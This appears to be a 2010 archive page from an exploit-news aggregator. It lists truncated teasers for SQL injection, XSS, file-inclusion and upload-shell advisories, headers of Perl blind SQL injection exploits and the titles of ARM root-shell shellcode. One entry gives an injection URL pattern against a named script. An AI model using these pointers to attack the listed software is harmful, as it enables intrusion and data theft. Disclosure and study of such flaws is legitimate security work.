Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for June, 2010

PHP Bible Search Xss & SQL Injection Vulnerabilities


CubeCart PHP (shipkey parameter) <= 4.3.x Remote SQL Injection

SQL Injection in CubeCart PHP Free & Commercial Shopping Cart Application
1. *Advisory Information*
Title: SQL Injection in CubeCart PHP Free & Commercial [...]


linux/ARM – setuid(0) & kill(-1, SIGKILL) – 28 bytes

/*
Title: Linux/ARM – setuid(0) & kill(-1, SIGKILL) – 28 bytes
(Kill all processes)
Date: 2010-06-29
Tested: ARM926EJ-S [...]


linux/ARM – setuid(0) & execve("/bin/sh","/bin/sh",0) – 38 bytes

/*
Title: Linux/ARM – setuid(0) & execve("/bin/sh","/bin/sh",0) – 38 bytes
Date: 2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org [...]


Inj3ct0r’s Community => 0xr00t / Make haste to register :)

opened a test forum. Please register. Registration will close 07/30/2010
0xr00t.com/index.php
Actively involved. Inactive user will be removed from the [...]


Joomla Component com_gamesbox 1.0.2 SQL Injection Vulnerability

Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : [...]


Specialist Bed and Breakfast Website SQL Injection Vulnerability

# Exploit Title: Specialist Bed and Breakfast website SQL injection Vulnerability
# Date: 30/06/2010
# Author: JaMbA
#Script url: http://www.internetdm.co.uk/site/pages.php?fid=0,1,356
# Version: **N/A
# Tested on: Windows
# CVE : [...]


Joomla joomanager SQL Injection Vulnerability


Photo Store Upload Shell Vulnerability

##########################################
#[+] Date: 30/06/2010 #
#[+] Author: MeGo #
#[+] Tested ON :windows xP #
#[+] MY Team : Team Hacker Egypt #
#[+] Email: M3GO@live.com #
#[+] CategorY : Webapps/0day TYPE: PHP#
##########################################
{?}Dork "Copyright 2007 [...]


Joomla Component com_wmtpic SQL Injection Vulnerability


webERP v3.11.4 Multiple Vulnerabilities

# Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possible all versions)
# Vendor: http://www.weberp.org
# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and [...]


Oxygen2PHP <= 1.1.3 (member.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (member.php) Remote SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use LWP::UserAgent;
use HTTP::Cookies;
use strict;
my $UserName = [...]


Golf Club CMS SQL Injection Vulnerability

# Exploit Title: Golf Club SQL injection Vulnerability
# Date: 30/06/2010
# Author: JaMbA
#Script url: http://www.internetdm.co.uk/site/pages.php?fid=0,1,362
# Version: **N/A
# Tested on: Windows
# CVE : ()
###################################################################################
#########################[ EXPL0!T ]#########################
http://server/path/pages.php?fid=0,13&pp_id=38[SQL]
###################################################################################
Greetz to : Alnjm33-virus-pal [...]


Joomla Component com_newsfeeds RFI Vulnerability

[?] My h0m3: [http://HaCkTeCh.Org/cc& Pal-Li0n.som [...]


Web Design Noida SQL Injection Vulnerability


Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (forumdisplay.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (products.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


ShopCartDx <= v4.30 (product_detail.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit

#!/usr/bin/perl
#[0-Day] Oxygen2PHP <= 1.1.3 (post.php) Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use [...]


MOHA Chat 0.1.1 XSS|HTML Injection Vulnerabilities
